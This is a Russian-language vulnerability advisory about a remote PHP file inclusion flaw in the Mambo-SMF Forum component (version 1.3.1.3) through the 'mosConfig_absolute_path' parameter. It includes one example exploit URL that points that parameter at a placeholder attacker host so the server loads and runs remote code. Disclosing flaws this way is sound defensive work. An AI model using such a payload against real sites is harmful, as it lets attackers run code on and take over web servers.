PHP-инклюдинг в Mambo-SMF Forum

Дата публикации:
19.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
5753
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Mambo-SMF Forum 1.x (компонент к Mambo)
Уязвимые версии: Mambo-SMF Forum (компонент Mambo) 1.3.1.3, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_smf/smf.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts]

URL производителя: mamboxchange.com/projects/mambo-smf/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Joomla-SMF Forum Bridge For Mambo 4.5.3+ And Mambo 4.5.3+ Remote File Inclusion Vulnebrality

или введите имя

CAPTCHA